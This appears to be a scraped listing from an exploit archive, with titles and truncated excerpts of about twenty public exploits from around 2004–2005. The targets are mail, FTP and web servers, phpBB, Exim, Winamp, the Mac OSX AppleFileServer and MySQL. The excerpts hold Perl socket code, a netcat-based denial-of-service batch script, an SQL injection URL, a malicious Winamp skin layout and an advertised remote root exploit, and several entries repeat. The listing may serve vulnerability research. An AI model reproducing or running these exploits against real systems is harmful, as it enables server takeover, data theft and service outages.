siteman.noam.txt

!/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host my $Path = shift; my $Host = shift; my $Username = shift; my...

Exim 4.41 - dns_build_reverse Local Buffer Overflow

Exim 4.41 - dnsbuildreverse Local Buffer Overflow / This proof-of-concept demonstrates the existence of the vulnerability reported by iDEFENSE iDEFENSE Security Advisory 01.14.05. It has been tested against exim-4.41 under Debian GNU/Linux. Note that setuid is not included in the shellcode to avo...

phpbb2011.txt

Phpbb: All vulnerable all except 2.0.11 Attachment module: All version vulnerable Howdark update opened wide my eyes with his nice exploit: Bugtraq id: 10701 ----- viewtopic.php?t=1&highlight=%2527 ----- Looking at the code I saw that was possible inject any type of Sql query with a multiple char...

Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003.

Summary: Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003 http://www.pmail.com/. Details: Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003. There are 14 vulnerable commands that can be used to cause buffer overflows to occur. After a successful login to the mail...

Mercury32 Mail Server 4.01a - check Buffer Overflow

Mercury32 Mail Server 4.01a - check Buffer Overflow ===== Start Mercury32Overflow.pl ===== Usage: Mercury32Overflow.pl Mercury32Overflow.pl 127.0.0.1 hello moto Mercury/32, v4.01a, Dec 8 2003 Download: http://www.pmail.com/ use IO::Socket; use strict; my$socket = ""; if $socket =...

Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc =============================================================== Mercury/32 Mail Server Mercury32Overflow.pl 127.0.0.1 hello moto Mercury/32, v4.01a, Dec 8 2003 Download: http://www.pmail.com/ use IO::Socket; use strict; my$socket = ""; if $socket...

Mercury/32 Mail Server &lt;= 4.01a (check) Buffer Overflow Exploit

No description provided by source. ===== Start Mercury32Overflow.pl ===== Usage: Mercury32Overflow.pl ip imap4 user imap4 pass Mercury32Overflow.pl 127.0.0.1 hello moto Mercury/32, v4.01a, Dec 8 2003 Download: http://www.pmail.com/ use IO::Socket; use strict; my$socket = ""; if $socket =...

WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc ==================================================== WSFTP Server WSFTPOverflow.pl 127.0.0.1 hello moto WSFTP Server Version 5.03, 2004.10.14 Download: http://www.ipswitch.com/ use IO::Socket; use strict; my$socket = ""; if $socket =...

WS_FTP Server &lt;= 5.03 (RNFR) Buffer Overflow Exploit

No description provided by source. ===== Start WSFTPOverflow.pl ===== Usage: WSFTPOverflow.pl ip ftp user ftp pass WSFTPOverflow.pl 127.0.0.1 hello moto WSFTP Server Version 5.03, 2004.10.14 Download: http://www.ipswitch.com/ use IO::Socket; use strict; my$socket = ""; if $socket =...

Ipswitch WS_FTP Server 5.03 - &#039;RNFR&#039; Buffer Overflow

===== Start WSFTPOverflow.pl ===== Usage: WSFTPOverflow.pl WSFTPOverflow.pl 127.0.0.1 hello moto WSFTP Server Version 5.03, 2004.10.14 Download: http://www.ipswitch.com/ use IO::Socket; use strict; my$socket = ""; if $socket = IO::Socket::INET-newPeerAddr = $ARGV0, PeerPort = "21", Proto = "TCP"...

DMS POP3 Server (1.5.3 build 37) Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ======================================================== DMS POP3 Server 1.5.3 build 37 Buffer Overflow Exploit ======================================================== ===== Start DMSPOP3Overflow.pl ===== Usage: DMSPOP3Overflow.pl...

DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow

DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow ===== Start DMSPOP3Overflow.pl ===== Usage: DMSPOP3Overflow.pl DMSPOP3Overflow.pl 127.0.0.1 110 DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 Download: http://www.digitalmapping.sk.ca/pop3srv/default.asp Patch:...

Secure Network Messenger <= 1.4.2 Denial of Service Exploit

Exploit for unknown platform in category dos / poc =========================================================== Secure Network Messenger ; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response from host."; sleep 1; print "\nSuccesfully...

Apache 2.0.52 Multiple Space Header DoS (Perl code)

Exploit for unknown platform in category dos / poc =================================================== Apache 2.0.52 Multiple Space Header DoS Perl code =================================================== !/usr/bin/perl Noam Rathaus of Beyond Security Ltd. use strict; use IO::Socket::INET; usage...

SLX Server 6.1 Arbitrary File Creation Exploit (PoC)

Exploit for unknown platform in category remote exploits ==================================================== SLX Server 6.1 Arbitrary File Creation Exploit PoC ==================================================== !/usr/bin/perl Proof of concept exploit: Arbitrary file creation for SLX server 6.1...

winampExploit.txt

index.html ----------- Load.php --------- foo.wsz foo.zip ----------------- /frame/ /maki/ /shade/ /html/ /html/file.exe malicious file to execute /html/test.htm html to load the .exe /player/ /player/Thumbs.db /xml/ /xml/includes.xml /xml/player-normal.xml /xml/player.xml /skin.xml /html/test.ht...

Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution

!/usr/bin/perl Priv8security com remote root exploit for AppleFileServer. PUBLIC VERSION!!!! Bug found by Dave G. and Dino Dai Zovi. URL: http://www.atstake.com/research/advisories/2004/a050304-1.txt wsxz@localhost buffer$ perl priv8afp.pl -h 10.4.12.199 -t 0 -=Priv8security.com Apple File Server...

Xitami Web Server Denial of Service Exploit

Exploit for unknown platform in category dos / poc =========================================== Xitami Web Server Denial of Service Exploit =========================================== if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if n...

Xitami Web Server - Denial of Service

Xitami Web Server - Denial of Service if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if not exist %%$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof echo GET / HTTP/1.0http.tmp echo HOST: %1http.tmp echo DOShttp.tmp echo.http.t...

MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit

Exploit for multiple platform in category remote exploits ======================================================= MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit ======================================================= !/usr/bin/perl The script connects to MySQL and attempts to log in usin...